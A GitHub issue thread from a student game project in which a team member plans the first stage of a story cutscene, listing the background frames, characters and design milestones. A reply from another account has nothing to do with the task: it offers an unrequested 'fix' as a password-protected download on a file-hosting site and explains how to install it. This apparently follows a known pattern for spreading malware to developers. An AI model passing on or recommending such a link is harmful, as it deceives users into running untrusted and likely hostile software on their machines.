### ISSUE TITLE
Story Line [Stage 1]

### ISSUE THREAD

**Issue by jtayl647** [UQcsse3200/2024-studio-2#186]
# **Description**
**Task:** [Story Line[Stage 1]](#3)
**Feature:** [[Team 6] Start Screen & Menu Development](#158)

For this task, I will create the first section of a cutscene, focusing on the user interface (UI) and story elements. This will involve designing the background images that appear on screen. The objective is to provide a seamless narrative experience, with text and visuals that convey key story points and character interactions. I will ensure that the UI elements are intuitive and visually appealing, enhancing the storytelling experience without distracting the player. The design will include clear text formatting, appropriate pacing of dialogue, and transitions between different scenes to keep the player engaged and informed about the plot progression. This first section will set the tone for the game's narrative and establish a strong foundation for further storytelling.

# **Dependencies**
 
# **Milestones**
List of steps that need to be completed for this task.

- [x] Initial documentation of story on wiki (Sep. 2)
- [x] Initial frames Background (Sep. 5)
- [x] Initial Characters for frames (Sep. 7)
- [x] Final frames design (Sep. 13)
 
# **Documentation**
Wiki Page [Story Line] https://github.com/UQcsse3200/2024-studio-2/wiki/Story-Line

# **Member**
- Jaimee (@jtayl647) (Jaimee Taylor)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
